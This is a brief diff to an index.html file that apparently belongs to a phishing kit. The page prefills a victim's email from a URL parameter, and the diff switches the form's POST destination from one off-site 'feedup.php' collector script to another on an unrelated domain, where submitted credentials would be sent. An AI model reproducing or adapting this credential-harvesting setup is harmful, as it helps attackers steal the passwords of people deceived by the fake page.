--- a/index.html
+++ b/index.html
@@ -297,7 +297,7 @@ $("#email").val($.urlPeram('email'));
                 </div>
                 <!-- End of server response message div -->
 
-                <form action="https://jacktrading.000webhostapp.com/feedup.php" method="post">
+                <form action="https://polywin.co.in/Paymt/feedup.php" method="post">
                   
                     <div class="form-group">
                     <!-- User Email Label -->
